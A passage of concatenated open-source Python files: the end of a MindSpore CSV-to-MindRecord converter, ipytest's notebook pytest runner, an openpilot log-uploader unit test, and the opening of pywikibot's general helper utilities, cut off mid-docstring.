columns_list(list[str], optional): A list of columns to be read. Default: None.
partition_number (int, optional): partition size, Default: 1.
Raises:
ValueError: If `source`, `destination`, `partition_number` is invalid.
RuntimeError: If `columns_list` is invalid.
"""
def __init__(self, source, destination, columns_list=None, partition_number=1):
if not pd:
raise Exception("Module pandas is not found, please use pip install it.")
if isinstance(source, str):
check_filename(source)
self.source = source
else:
raise ValueError("The parameter source must be str.")
self._check_columns(columns_list, "columns_list")
self.columns_list = columns_list
if isinstance(destination, str):
check_filename(destination)
self.destination = destination
else:
raise ValueError("The parameter destination must be str.")
if partition_number is not None:
if not isinstance(partition_number, int):
raise ValueError("The parameter partition_number must be int")
self.partition_number = partition_number
else:
raise ValueError("The parameter partition_number must be int")
self.writer = FileWriter(self.destination, self.partition_number)
def _check_columns(self, columns, columns_name):
"""
Validate the columns of csv
"""
if not columns:
return
if isinstance(columns, list):
for col in columns:
if not isinstance(col, str):
raise ValueError("The parameter {} must be list of str.".format(columns_name))
else:
raise ValueError("The parameter {} must be list of str.".format(columns_name))
def _get_schema(self, df):
"""
Construct schema from df columns
"""
if self.columns_list:
for col in self.columns_list:
if col not in df.columns:
raise RuntimeError("The parameter columns_list is illegal, column {} does not exist.".format(col))
else:
self.columns_list = df.columns
schema = {}
for col in self.columns_list:
if str(df[col].dtype) == 'int64':
schema[col] = {"type": "int64"}
elif str(df[col].dtype) == 'float64':
schema[col] = {"type": "float64"}
elif str(df[col].dtype) == 'bool':
schema[col] = {"type": "int32"}
else:
schema[col] = {"type": "string"}
if not schema:
raise RuntimeError("Failed to generate schema from csv file.")
return schema
def _get_row_of_csv(self, df, columns_list):
"""Get row data from csv file."""
for _, r in df.iterrows():
row = {}
for col in columns_list:
if str(df[col].dtype) == 'bool':
row[col] = int(r[col])
else:
row[col] = r[col]
yield row
def run(self):
"""
Execute transformation from csv to MindRecord.
Returns:
MSRStatus, whether csv is successfully transformed to MindRecord.
"""
if not os.path.exists(self.source):
raise IOError("Csv file {} do not exist.".format(self.source))
pd.set_option('display.max_columns', None)
df = pd.read_csv(self.source)
csv_schema = self._get_schema(df)
logger.info("transformed MindRecord schema is: {}".format(csv_schema))
# set the header size
self.writer.set_header_size(1 << 24)
# set the page size
self.writer.set_page_size(1 << 26)
# create the schema
self.writer.add_schema(csv_schema, "csv_schema")
# add the index
self.writer.add_index(list(self.columns_list))
csv_iter = self._get_row_of_csv(df, self.columns_list)
batch_size = 256
transform_count = 0
while True:
data_list = []
try:
for _ in range(batch_size):
data_list.append(csv_iter.__next__())
transform_count += 1
self.writer.write_raw_data(data_list)
logger.info("transformed {} record...".format(transform_count))
except StopIteration:
if data_list:
self.writer.write_raw_data(data_list)
logger.info(
"transformed {} record...".format(transform_count))
break
ret = self.writer.commit()
return ret
def transform(self):
"""
Encapsulate the run function to exit normally
"""
t = ExceptionThread(target=self.run)
t.daemon = True
t.start()
t.join()
if t.exitcode != 0:
raise t.exception
return t.res
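# Illustrative usage sketch (not part of the original module); the CSV path and
# MindRecord destination below are hypothetical:
#
#     csv_transformer = CsvToMR("input.csv", "output.mindrecord", partition_number=1)
#     csv_transformer.transform()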
|
_impl.py
|
from __future__ import print_function, division, absolute_import
import ast
import contextlib
import fnmatch
import importlib
import pathlib
import shlex
import sys
import tempfile
import threading
import packaging.version
import pytest
from IPython import get_ipython
from ._config import current_config
def run(*args, module=None, plugins=()):
"""Execute all tests in the passed module (defaults to __main__) with pytest.
:param args:
additional commandline options passed to pytest
:param module:
the module containing the tests. If not given, `__main__` will be used.
:param filename:
the filename of the file containing the tests. It has to be a real
        file, e.g., a notebook name, since its existence will be checked by
pytest. If not given, the `__file__` attribute of the passed module
will be used.
:param plugins:
additional plugins passed to pytest.
"""
import ipytest
run = run_in_thread if current_config["run_in_thread"] else run_direct
ipytest.exit_code = run(
_run_impl,
*args,
module=module,
plugins=plugins,
)
def run_pytest_clean(line, cell):
"""IPython magic function running pytest after cleaning the tests"""
clean_tests()
get_ipython().run_cell(cell)
run(*shlex.split(line))
def run_pytest(line, cell):
"""IPython magic function running pytest"""
get_ipython().run_cell(cell)
run(*shlex.split(line))
def clean_tests(pattern=None, items=None):
"""Delete tests with names matching the given pattern.
In IPython the results of all evaluations are kept in global variables
unless explicitly deleted. This behavior implies that when tests are renamed
the previous definitions will still be found if not deleted. This method
    aims to simplify this process.
    An effective pattern is to start the cell containing tests with a call
    to `clean_tests`, then define all test cases, and finally call `run_tests`.
This way renaming tests works as expected.
**Arguments:**
- `pattern`: a glob pattern used to match the tests to delete.
- `items`: the globals object containing the tests. If `None` is given, the
globals object is determined from the call stack.
"""
if items is None:
import __main__
items = vars(__main__)
if pattern is None:
pattern = current_config["clean"]
to_delete = [key for key in items.keys() if fnmatch.fnmatchcase(key, pattern)]
for key in to_delete:
del items[key]
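# Illustrative sketch (not part of the original module) of a typical notebook
# cell using the helpers above; the test body is a placeholder:
#
#     clean_tests("test_*")   # drop stale test definitions from the notebook globals
#
#     def test_addition():
#         assert 1 + 1 == 2
#
#     run("-q")               # collect and run the tests defined in __main__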
def reload(*mods):
"""Reload all modules passed as strings.
    This function may be useful when mixing code in external modules and
notebooks.
Usage::
reload("ipytest._util", "ipytest")
"""
for mod in mods:
importlib.reload(importlib.import_module(mod))
def _run_impl(*args, module, plugins):
with _prepared_module(module) as filename:
full_args = _build_full_args(args, filename)
return pytest.main(full_args, plugins=plugins)
def _build_full_args(args, filename):
def _fmt(arg):
return arg.format(MODULE=filename)
return [
*(_fmt(arg) for arg in current_config["addopts"]),
*(_fmt(arg) for arg in args),
*([filename] if current_config["defopts"] else []),
]
@contextlib.contextmanager
def _prepared_module(module):
if module is None: # pragma: no cover
import __main__ as module
with tempfile.NamedTemporaryFile(dir=".", suffix=".py") as f:
path = pathlib.Path(f.name)
module_name = path.stem
if not is_valid_module_name(module_name):
raise RuntimeError(
f"Invalid module name {module_name!r} generated by tempfile. "
"This should not happen, please open an issue at "
"'https://github.com/chmp/ipytest/issues' to report a bug."
)
if module_name in sys.modules:
raise RuntimeError(
f"Cannot register module with name {module_name!r}. It would "
"override and existing module. Consider not setting __file__ "
"inside the notebook. This way a random module name will be generated."
)
with patch(module, "__file__", str(path)):
with register_module(module, module_name):
yield str(path)
class RewriteAssertTransformer(ast.NodeTransformer):
def register_with_shell(self, shell):
shell.ast_transformers.append(self)
def unregister_with_shell(self, shell):
shell.ast_transformers[:] = [
transformer
for transformer in shell.ast_transformers
if transformer is not self
]
def visit(self, node):
from _pytest.assertion.rewrite import rewrite_asserts
pytest_version = get_pytest_version()
if pytest_version.release[0] >= 5:
# TODO: re-create a pseudo code to include the asserts?
rewrite_asserts(node, b"")
else:
rewrite_asserts(node)
return node
def get_pytest_version():
return packaging.version.parse(pytest.__version__)
@contextlib.contextmanager
def patch(obj, attr, val):
had_attr = hasattr(obj, attr)
prev_val = getattr(obj, attr, None)
setattr(obj, attr, val)
try:
yield
finally:
if not had_attr:
delattr(obj, attr)
else:
setattr(obj, attr, prev_val)
@contextlib.contextmanager
def register_module(obj, name):
if name in sys.modules:
raise RuntimeError(f"Cannot overwrite existing module {name}")
sys.modules[name] = obj
try:
yield
finally:
del sys.modules[name]
def run_direct(func, *args, **kwargs):
return func(*args, **kwargs)
def run_in_thread(func, *args, **kwargs):
res = None
def _thread():
nonlocal res
res = func(*args, **kwargs)
t = threading.Thread(target=_thread)
t.start()
t.join()
return res
def is_valid_module_name(name):
return all(c not in name for c in ".- ")
|
test_uploader.py
|
import time
import threading
import unittest
import logging
import json
from selfdrive.swaglog import cloudlog
import selfdrive.loggerd.uploader as uploader
from common.xattr import getxattr
from selfdrive.loggerd.tests.loggerd_tests_common import UploaderTestCase
class TestLogHandler(logging.Handler):
def __init__(self):
logging.Handler.__init__(self)
self.reset()
def reset(self):
self.upload_order = list()
self.upload_ignored = list()
def emit(self, record):
try:
j = json.loads(record.message)
if j["event"] == "upload_success":
self.upload_order.append(j["key"])
if j["event"] == "upload_ignored":
self.upload_ignored.append(j["key"])
except Exception:
pass
log_handler = TestLogHandler()
cloudlog.addHandler(log_handler)
class TestUploader(UploaderTestCase):
def setUp(self):
super(TestUploader, self).setUp()
log_handler.reset()
def tearDown(self):
super(TestUploader, self).tearDown()
def start_thread(self):
self.end_event = threading.Event()
self.up_thread = threading.Thread(target=uploader.uploader_fn, args=[self.end_event])
self.up_thread.daemon = True
self.up_thread.start()
def join_thread(self):
self.end_event.set()
self.up_thread.join()
def gen_files(self, lock=False):
f_paths = list()
for t in ["bootlog.bz2", "qlog.bz2", "rlog.bz2", "dcamera.hevc", "fcamera.hevc"]:
f_paths.append(self.make_file_with_data(self.seg_dir, t, 1, lock=lock))
return f_paths
def gen_order(self, seg1, seg2):
keys = [f"{self.seg_format.format(i)}/qlog.bz2" for i in seg1]
keys += [f"{self.seg_format2.format(i)}/qlog.bz2" for i in seg2]
for i in seg1:
keys += [f"{self.seg_format.format(i)}/{f}" for f in ['rlog.bz2', 'fcamera.hevc', 'dcamera.hevc']]
for i in seg2:
keys += [f"{self.seg_format2.format(i)}/{f}" for f in ['rlog.bz2', 'fcamera.hevc', 'dcamera.hevc']]
keys += [f"{self.seg_format.format(i)}/bootlog.bz2" for i in seg1]
keys += [f"{self.seg_format2.format(i)}/bootlog.bz2" for i in seg2]
return keys
def test_upload(self):
f_paths = self.gen_files(lock=False)
self.start_thread()
# allow enough time that files could upload twice if there is a bug in the logic
time.sleep(5)
self.join_thread()
self.assertTrue(len(log_handler.upload_ignored) == 0, "Some files were ignored")
self.assertFalse(len(log_handler.upload_order) < len(f_paths), "Some files failed to upload")
self.assertFalse(len(log_handler.upload_order) > len(f_paths), "Some files were uploaded twice")
for f_path in f_paths:
self.assertTrue(getxattr(f_path, uploader.UPLOAD_ATTR_NAME), "All files not uploaded")
exp_order = self.gen_order([self.seg_num], [])
self.assertTrue(log_handler.upload_order == exp_order, "Files uploaded in wrong order")
def test_upload_ignored(self):
self.set_ignore()
f_paths = self.gen_files(lock=False)
self.start_thread()
# allow enough time that files could upload twice if there is a bug in the logic
time.sleep(5)
self.join_thread()
self.assertTrue(len(log_handler.upload_order) == 0, "Some files were not ignored")
self.assertFalse(len(log_handler.upload_ignored) < len(f_paths), "Some files failed to ignore")
self.assertFalse(len(log_handler.upload_ignored) > len(f_paths), "Some files were ignored twice")
for f_path in f_paths:
self.assertTrue(getxattr(f_path, uploader.UPLOAD_ATTR_NAME), "All files not ignored")
exp_order = self.gen_order([self.seg_num], [])
self.assertTrue(log_handler.upload_ignored == exp_order, "Files ignored in wrong order")
def test_upload_files_in_create_order(self):
f_paths = list()
seg1_nums = [0, 1, 2, 10, 20]
for i in seg1_nums:
self.seg_dir = self.seg_format.format(i)
f_paths += self.gen_files()
seg2_nums = [5, 50, 51]
for i in seg2_nums:
self.seg_dir = self.seg_format2.format(i)
f_paths += self.gen_files()
self.start_thread()
# allow enough time that files could upload twice if there is a bug in the logic
time.sleep(5)
self.join_thread()
self.assertTrue(len(log_handler.upload_ignored) == 0, "Some files were ignored")
self.assertFalse(len(log_handler.upload_order) < len(f_paths), "Some files failed to upload")
self.assertFalse(len(log_handler.upload_order) > len(f_paths), "Some files were uploaded twice")
for f_path in f_paths:
self.assertTrue(getxattr(f_path, uploader.UPLOAD_ATTR_NAME), "All files not uploaded")
exp_order = self.gen_order(seg1_nums, seg2_nums)
self.assertTrue(log_handler.upload_order == exp_order, "Files uploaded in wrong order")
def test_no_upload_with_lock_file(self):
f_paths = self.gen_files(lock=True)
self.start_thread()
# allow enough time that files should have been uploaded if they would be uploaded
time.sleep(5)
self.join_thread()
for f_path in f_paths:
self.assertFalse(getxattr(f_path, uploader.UPLOAD_ATTR_NAME), "File upload when locked")
if __name__ == "__main__":
unittest.main()
|
__init__.py
|
"""Miscellaneous helper functions (not wiki-dependent)."""
#
# (C) Pywikibot team, 2008-2020
#
# Distributed under the terms of the MIT license.
#
import collections
import gzip
import hashlib
import inspect
import itertools
import os
import queue
import re
import stat
import subprocess
import sys
import threading
import time
import types
from collections.abc import Iterator, Mapping
from contextlib import suppress
from datetime import datetime
from distutils.version import LooseVersion, Version
from functools import wraps
from importlib import import_module
from inspect import getfullargspec
from ipaddress import ip_address
from itertools import zip_longest
from typing import Optional
from warnings import catch_warnings, showwarning, warn
from pywikibot.logging import debug
from pywikibot.tools._unidata import _first_upper_exception
try:
import bz2
except ImportError as bz2_import_error:
try:
import bz2file as bz2
warn('package bz2 was not found; using bz2file', ImportWarning)
except ImportError:
warn('package bz2 and bz2file were not found', ImportWarning)
bz2 = bz2_import_error
try:
import lzma
except ImportError as lzma_import_error:
lzma = lzma_import_error
PYTHON_VERSION = sys.version_info[:3]
_logger = 'tools'
class _NotImplementedWarning(RuntimeWarning):
"""Feature that is no longer implemented."""
pass
def is_IP(IP: str) -> bool: # noqa N802, N803
"""Verify the IP address provided is valid.
No logging is performed. Use ip_address instead to catch errors.
@param IP: IP address
"""
with suppress(ValueError):
ip_address(IP)
return True
return False
def has_module(module, version=None):
"""Check whether a module can be imported."""
try:
m = import_module(module)
except ImportError:
pass
else:
if version is None:
return True
try:
module_version = LooseVersion(m.__version__)
except AttributeError:
pass
else:
if module_version >= LooseVersion(version):
return True
else:
warn('Module version {} is lower than requested version {}'
.format(module_version, version), ImportWarning)
return False
def empty_iterator():
# http://stackoverflow.com/a/13243870/473890
"""An iterator which does nothing."""
return
yield
class classproperty: # noqa: N801
"""
Descriptor class to access a class method as a property.
This class may be used as a decorator::
class Foo:
_bar = 'baz' # a class property
@classproperty
def bar(cls): # a class property method
return cls._bar
Foo.bar gives 'baz'.
"""
def __init__(self, cls_method):
"""Hold the class method."""
self.method = cls_method
self.__doc__ = self.method.__doc__
def __get__(self, instance, owner):
"""Get the attribute of the owner class by its method."""
return self.method(owner)
class suppress_warnings(catch_warnings): # noqa: N801
"""A decorator/context manager that temporarily suppresses warnings.
    Those suppressed warnings that do not match the parameters will be
shown upon exit.
"""
def __init__(self, message='', category=Warning, filename=''):
"""Initialize the object.
The parameter semantics are similar to those of
`warnings.filterwarnings`.
@param message: A string containing a regular expression that the start
of the warning message must match. (case-insensitive)
@type message: str
@param category: A class (a subclass of Warning) of which the warning
category must be a subclass in order to match.
@type category: type
@param filename: A string containing a regular expression that the
start of the path to the warning module must match.
(case-sensitive)
@type filename: str
"""
self.message_match = re.compile(message, re.I).match
self.category = category
self.filename_match = re.compile(filename).match
super().__init__(record=True)
def __enter__(self):
"""Catch all warnings and store them in `self.log`."""
self.log = super().__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
"""Stop logging warnings and show those that do not match to params."""
super().__exit__(exc_type, exc_val, exc_tb)
for warning in self.log:
if (
not issubclass(warning.category, self.category)
or not self.message_match(str(warning.message))
or not self.filename_match(warning.filename)
):
showwarning(
warning.message, warning.category, warning.filename,
warning.lineno, warning.file, warning.line)
def __call__(self, func):
"""Decorate func to suppress warnings."""
@wraps(func)
def suppressed_func(*args, **kwargs):
with self:
return func(*args, **kwargs)
return suppressed_func
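# Illustrative usage sketch (not part of the original module): suppress_warnings
# as a context manager and as a decorator; the warned-about calls are
# hypothetical. The message pattern matches the start of the warning message,
# case-insensitively.
#
#     with suppress_warnings('deprecated', DeprecationWarning):
#         call_old_api()
#
#     @suppress_warnings(category=FutureWarning)
#     def quiet():
#         call_future_api()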
# From http://python3porting.com/preparing.html
class ComparableMixin:
"""Mixin class to allow comparing to other objects which are comparable."""
def __lt__(self, other):
"""Compare if self is less than other."""
return other > self._cmpkey()
def __le__(self, other):
"""Compare if self is less equals other."""
return other >= self._cmpkey()
def __eq__(self, other):
"""Compare if self is equal to other."""
return other == self._cmpkey()
def __ge__(self, other):
"""Compare if self is greater equals other."""
return other <= self._cmpkey()
def __gt__(self, other):
"""Compare if self is greater than other."""
return other < self._cmpkey()
def __ne__(self, other):
"""Compare if self is not equal to other."""
return other != self._cmpkey()
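# Illustrative sketch (not part of the original module): a minimal class using
# ComparableMixin; subclasses only need to provide _cmpkey().
#
#     class Money(ComparableMixin):
#         def __init__(self, amount):
#             self.amount = amount
#         def _cmpkey(self):
#             return self.amount
#
#     Money(3) < Money(5)   # True, compared via _cmpkey()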
class DotReadableDict:
"""Parent class of Revision() and FileInfo().
Provide: __getitem__() and __repr__().
"""
def __getitem__(self, key):
"""Give access to class values by key.
Revision class may also give access to its values by keys
        e.g. revid parameter may be accessed as revision['revid']
as well as revision.revid. This makes formatting strings with
% operator easier.
"""
return getattr(self, key)
def __repr__(self):
"""Return a more complete string representation."""
return repr(self.__dict__)
class _FrozenDict(dict):
"""
Frozen dict, preventing write after initialisation.
Raises TypeError if write attempted.
"""
def __init__(self, data=None, error: Optional[str] = None):
"""
Initializer.
@param data: mapping to freeze
@type data: mapping
@param error: error message
"""
if data:
args = [data]
else:
args = []
super().__init__(*args)
self._error = error or 'FrozenDict: not writable'
def update(self, *args, **kwargs):
"""Prevent updates."""
raise TypeError(self._error)
__setitem__ = update
class frozenmap(Mapping): # noqa: N801
"""Frozen mapping, preventing write after initialisation."""
def __init__(self, data=(), **kwargs):
"""Initialize data in same ways like a dict."""
self.__data = {}
if isinstance(data, Mapping):
for key in data:
self.__data[key] = data[key]
elif hasattr(data, 'keys'):
for key in data.keys():
self.__data[key] = data[key]
else:
for key, value in data:
self.__data[key] = value
for key, value in kwargs.items():
self.__data[key] = value
def __getitem__(self, key):
return self.__data[key]
def __iter__(self):
return iter(self.__data)
def __len__(self):
return len(self.__data)
def __repr__(self):
return '{}({!r})'.format(self.__class__.__name__, self.__data)
class LazyRegex:
"""
Regex object that obtains and compiles the regex on usage.
Instances behave like the object created using L{re.compile}.
"""
def __init__(self, pattern, flags=0):
"""
Initializer.
@param pattern: L{re} regex pattern
@type pattern: str or callable
@param flags: L{re.compile} flags
@type flags: int
"""
self.raw = pattern
self.flags = flags
super().__init__()
@property
def raw(self):
"""The raw property."""
if callable(self._raw):
self._raw = self._raw()
return self._raw
@raw.setter
def raw(self, value):
self._raw = value
self._compiled = None
@property
def flags(self):
"""The flags property."""
return self._flags
@flags.setter
def flags(self, value):
self._flags = value
self._compiled = None
def __getattr__(self, attr):
"""Compile the regex and delegate all attribute to the regex."""
if self._raw:
if not self._compiled:
self._compiled = re.compile(self.raw, self.flags)
if hasattr(self._compiled, attr):
return getattr(self._compiled, attr)
raise AttributeError('%s: attr %s not recognised'
% (self.__class__.__name__, attr))
else:
raise AttributeError('%s.raw not set' % self.__class__.__name__)
class DeprecatedRegex(LazyRegex):
"""Regex object that issues a deprecation notice."""
def __init__(self, pattern, flags=0, name=None, instead=None, since=None):
"""
Initializer.
If name is None, the regex pattern will be used as part of
the deprecation warning.
@param name: name of the object that is deprecated
@type name: str or None
@param instead: if provided, will be used to specify the replacement
of the deprecated name
@type instead: str
"""
super().__init__(pattern, flags)
self._name = name or self.raw
self._instead = instead
self._since = since
def __getattr__(self, attr):
"""Issue deprecation warning."""
issue_deprecation_warning(
self._name, self._instead, warning_class=FutureWarning,
since=self._since)
return super().__getattr__(attr)
def first_lower(string: str) -> str:
"""
Return a string with the first character uncapitalized.
Empty strings are supported. The original string is not changed.
"""
return string[:1].lower() + string[1:]
def first_upper(string: str) -> str:
"""
Return a string with the first character capitalized.
Empty strings are supported. The original string is not changed.
@note: MediaWiki doesn't capitalize some characters the same way as Python.
This function tries to be close to MediaWiki's capitalize function in
title.php. See T179115 and T200357.
"""
first = string[:1]
return (_first_upper_exception(first) or first.upper()) + string[1:]
def normalize_username(username) -> Optional[str]:
"""Normalize the username."""
if not username:
return None
username = re.sub('[_ ]+', ' ', username).strip()
return first_upper(username)
class MediaWikiVersion(Version):
"""
Version object to allow comparing 'wmf' versions with normal ones.
    The version mainly consists of digits separated by periods. After that is a
    suffix which may only be 'wmf<number>', 'alpha', 'beta<number>' or
    '-rc.<number>' (the - and . are optional). They are considered from old to
    new in that order, with a version number without suffix considered the
    newest. This secondary difference is stored in an internal _dev_version
attribute.
Two versions are equal if their normal version and dev version are equal. A
version is greater if the normal version or dev version is greater. For
example:
1.24 < 1.24.1 < 1.25wmf1 < 1.25alpha < 1.25beta1 < 1.25beta2
    < 1.25-rc.1 < 1.25-rc.2 < 1.25
Any other suffixes are considered invalid.
"""
MEDIAWIKI_VERSION = re.compile(
r'(\d+(?:\.\d+)+)(-?wmf\.?(\d+)|alpha|beta(\d+)|-?rc\.?(\d+)|.*)?$')
@classmethod
def from_generator(cls, generator):
"""Create instance using the generator string."""
if not generator.startswith('MediaWiki '):
raise ValueError('Generator string ({!r}) must start with '
'"MediaWiki "'.format(generator))
return cls(generator[len('MediaWiki '):])
def parse(self, vstring):
"""Parse version string."""
version_match = MediaWikiVersion.MEDIAWIKI_VERSION.match(vstring)
if not version_match:
raise ValueError('Invalid version number "{}"'.format(vstring))
components = [int(n) for n in version_match.group(1).split('.')]
# The _dev_version numbering scheme might change. E.g. if a stage
# between 'alpha' and 'beta' is added, 'beta', 'rc' and stable releases
# are reassigned (beta=3, rc=4, stable=5).
if version_match.group(3): # wmf version
self._dev_version = (0, int(version_match.group(3)))
elif version_match.group(4):
self._dev_version = (2, int(version_match.group(4)))
elif version_match.group(5):
self._dev_version = (3, int(version_match.group(5)))
elif version_match.group(2) in ('alpha', '-alpha'):
self._dev_version = (1, )
else:
for handled in ('wmf', 'alpha', 'beta', 'rc'):
# if any of those pops up here our parser has failed
assert handled not in version_match.group(2), \
'Found "{}" in "{}"'.format(handled,
version_match.group(2))
if version_match.group(2):
debug('Additional unused version part '
'"{}"'.format(version_match.group(2)),
_logger)
self._dev_version = (4, )
self.suffix = version_match.group(2) or ''
self.version = tuple(components)
def __str__(self):
"""Return version number with optional suffix."""
return '.'.join(str(v) for v in self.version) + self.suffix
def _cmp(self, other):
if isinstance(other, str):
other = MediaWikiVersion(other)
if self.version > other.version:
return 1
if self.version < other.version:
return -1
if self._dev_version > other._dev_version:
return 1
if self._dev_version < other._dev_version:
return -1
return 0
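# Illustrative sketch (not part of the original module) of the ordering the
# class docstring describes:
#
#     MediaWikiVersion('1.25wmf1') < MediaWikiVersion('1.25') < MediaWikiVersion('1.25.1')
#     MediaWikiVersion.from_generator('MediaWiki 1.25wmf1') == MediaWikiVersion('1.25wmf1')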
class ThreadedGenerator(threading.Thread):
"""Look-ahead generator class.
Runs a generator in a separate thread and queues the results; can
be called like a regular generator.
Subclasses should override self.generator, I{not} self.run
Important: the generator thread will stop itself if the generator's
internal queue is exhausted; but, if the calling program does not use
all the generated values, it must call the generator's stop() method to
stop the background thread. Example usage:
>>> gen = ThreadedGenerator(target=range, args=(20,))
>>> try:
... data = list(gen)
... finally:
... gen.stop()
>>> data
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
"""
def __init__(self, group=None, target=None, name='GeneratorThread',
args=(), kwargs=None, qsize=65536):
"""Initializer. Takes same keyword arguments as threading.Thread.
target must be a generator function (or other callable that returns
an iterable object).
@param qsize: The size of the lookahead queue. The larger the qsize,
the more values will be computed in advance of use (which can eat
up memory and processor time).
@type qsize: int
"""
if kwargs is None:
kwargs = {}
if target:
self.generator = target
if not hasattr(self, 'generator'):
raise RuntimeError('No generator for ThreadedGenerator to run.')
self.args, self.kwargs = args, kwargs
super().__init__(group=group, name=name)
self.queue = queue.Queue(qsize)
self.finished = threading.Event()
def __iter__(self):
"""Iterate results from the queue."""
if not self.is_alive() and not self.finished.isSet():
self.start()
# if there is an item in the queue, yield it, otherwise wait
while not self.finished.isSet():
try:
yield self.queue.get(True, 0.25)
except queue.Empty:
pass
except KeyboardInterrupt:
self.stop()
def stop(self):
"""Stop the background thread."""
self.finished.set()
def run(self):
"""Run the generator and store the results on the queue."""
iterable = any(hasattr(self.generator, key)
for key in ('__iter__', '__getitem__'))
if iterable and not self.args and not self.kwargs:
self.__gen = self.generator
else:
self.__gen = self.generator(*self.args, **self.kwargs)
for result in self.__gen:
while True:
if self.finished.isSet():
return
try:
self.queue.put_nowait(result)
except queue.Full:
time.sleep(0.25)
continue
break
# wait for queue to be emptied, then kill the thread
while not self.finished.isSet() and not self.queue.empty():
time.sleep(0.25)
self.stop()
def itergroup(iterable, size: int):
"""Make an iterator that returns lists of (up to) size items from iterable.
Example:
>>> i = itergroup(range(25), 10)
>>> print(next(i))
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> print(next(i))
[10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
>>> print(next(i))
[20, 21, 22, 23, 24]
>>> print(next(i))
Traceback (most recent call last):
...
StopIteration
"""
group = []
for item in iterable:
group.append(item)
if len(group) == size:
yield group
group = []
if group:
yield group
def islice_with_ellipsis(iterable, *args, marker='…'):
"""
Generator which yields the first n elements of the iterable.
If more elements are available and marker is True, it returns an extra
string marker as continuation mark.
    Function takes the same arguments as C{itertools.islice}
    and the additional keyword marker.
@param iterable: the iterable to work on
@type iterable: iterable
@param args: same args as:
- C{itertools.islice(iterable, stop)}
- C{itertools.islice(iterable, start, stop[, step])}
@param marker: element to yield if iterable still contains elements
after showing the required number. Default value: '…'
@type marker: str
"""
s = slice(*args)
_iterable = iter(iterable)
yield from itertools.islice(_iterable, *args)
if marker and s.stop is not None:
with suppress(StopIteration):
next(_iterable)
yield marker
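# Illustrative sketch (not part of the original module):
#
#     list(islice_with_ellipsis(range(10), 3))   # [0, 1, 2, '…']
#     list(islice_with_ellipsis(range(3), 5))    # [0, 1, 2] (nothing was cut off)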
class ThreadList(list):
"""A simple threadpool class to limit the number of simultaneous threads.
Any threading.Thread object can be added to the pool using the append()
method. If the maximum number of simultaneous threads has not been reached,
the Thread object will be started immediately; if not, the append() call
will block until the thread is able to start.
>>> pool = ThreadList(limit=10)
>>> def work():
... time.sleep(1)
...
>>> for x in range(20):
... pool.append(threading.Thread(target=work))
...
"""
_logger = 'threadlist'
def __init__(self, limit=128, wait_time=2, *args):
"""Initializer.
@param limit: the number of simultaneous threads
@type limit: int
@param wait_time: how long to wait if active threads exceeds limit
@type wait_time: int or float
"""
self.limit = limit
self.wait_time = wait_time
super().__init__(*args)
for item in self:
if not isinstance(item, threading.Thread):
raise TypeError("Cannot add '{}' to ThreadList"
.format(type(item)))
def active_count(self):
"""Return the number of alive threads and delete all non-alive ones."""
cnt = 0
for item in self[:]:
if item.is_alive():
cnt += 1
else:
self.remove(item)
return cnt
def append(self, thd):
"""Add a thread to the pool and start it."""
if not isinstance(thd, threading.Thread):
raise TypeError("Cannot append '{}' to ThreadList"
.format(type(thd)))
while self.active_count() >= self.limit:
time.sleep(self.wait_time)
super().append(thd)
thd.start()
debug("thread {} ('{}') started".format(len(self), type(thd)),
self._logger)
def stop_all(self):
"""Stop all threads the pool."""
if self:
debug('EARLY QUIT: Threads: {}'.format(len(self)), self._logger)
for thd in self:
thd.stop()
debug('EARLY QUIT: Queue size left in {}: {}'
.format(thd, thd.queue.qsize()), self._logger)
def intersect_generators(genlist, allow_duplicates=False):
"""
Intersect generators listed in genlist.
Yield items only if they are yielded by all generators in genlist.
Threads (via ThreadedGenerator) are used in order to run generators
in parallel, so that items can be yielded before generators are
exhausted.
Threads are stopped when they are either exhausted or Ctrl-C is pressed.
Quitting before all generators are finished is attempted if
there is no more chance of finding an item in all queues.
@param genlist: list of page generators
@type genlist: list
@param allow_duplicates: allow duplicates if present in all generators
@type allow_duplicates: bool
"""
# If any generator is empty, no pages are going to be returned
for source in genlist:
if not source:
debug('At least one generator ({!r}) is empty and execution was '
'skipped immediately.'.format(source), 'intersect')
return
# Item is cached to check that it is found n_gen
# times before being yielded.
from collections import Counter
cache = collections.defaultdict(Counter)
n_gen = len(genlist)
# Class to keep track of alive threads.
# Start new threads and remove completed threads.
thrlist = ThreadList()
for source in genlist:
threaded_gen = ThreadedGenerator(name=repr(source), target=source)
threaded_gen.daemon = True
thrlist.append(threaded_gen)
ones = Counter(thrlist)
seen = {}
while True:
# Get items from queues in a round-robin way.
for t in thrlist:
try:
# TODO: evaluate if True and timeout is necessary.
item = t.queue.get(True, 0.1)
if not allow_duplicates and hash(item) in seen:
continue
# Cache entry is a Counter of ThreadedGenerator objects.
cache[item].update([t])
if len(cache[item]) == n_gen:
if allow_duplicates:
yield item
# Remove item from cache if possible.
if all(el == 1 for el in cache[item].values()):
cache.pop(item)
else:
cache[item] -= ones
else:
yield item
cache.pop(item)
seen[hash(item)] = True
active = thrlist.active_count()
max_cache = n_gen
if cache.values():
max_cache = max(len(v) for v in cache.values())
# No. of active threads is not enough to reach n_gen.
# We can quit even if some thread is still active.
# There could be an item in all generators which has not yet
# appeared from any generator. Only when we have lost one
# generator, then we can bail out early based on seen items.
if active < n_gen and n_gen - max_cache > active:
thrlist.stop_all()
return
except queue.Empty:
pass
except KeyboardInterrupt:
thrlist.stop_all()
finally:
# All threads are done.
if thrlist.active_count() == 0:
return
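# Illustrative sketch (not part of the original module): any iterables work as
# "generators" here, e.g. two overlapping lists standing in for page generators.
#
#     common = set(intersect_generators([['A', 'B', 'C'], ['B', 'C', 'D']]))
#     # common == {'B', 'C'}; the yield order depends on thread scheduling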
def roundrobin_generators(*iterables):
"""Yield simultaneous from each iterable.
Sample:
>>> tuple(roundrobin_generators('ABC', range(5)))
('A', 0, 'B', 1, 'C', 2, 3, 4)
@param iterables: any iterable to combine in roundrobin way
@type iterables: iterable
@return: the combined generator of iterables
@rtype: generator
"""
return (item
for item in itertools.chain.from_iterable(zip_longest(*iterables))
if item is not None)
def filter_unique(iterable, container=None, key=None, add=None):
"""
Yield unique items from an iterable, omitting duplicates.
By default, to provide uniqueness, it puts the generated items into a
set created as a local variable. It only yields items which are not
already present in the local set.
For large collections, this is not memory efficient, as a strong reference
to every item is kept in a local set which cannot be cleared.
Also, the local set can't be re-used when chaining unique operations on
multiple generators.
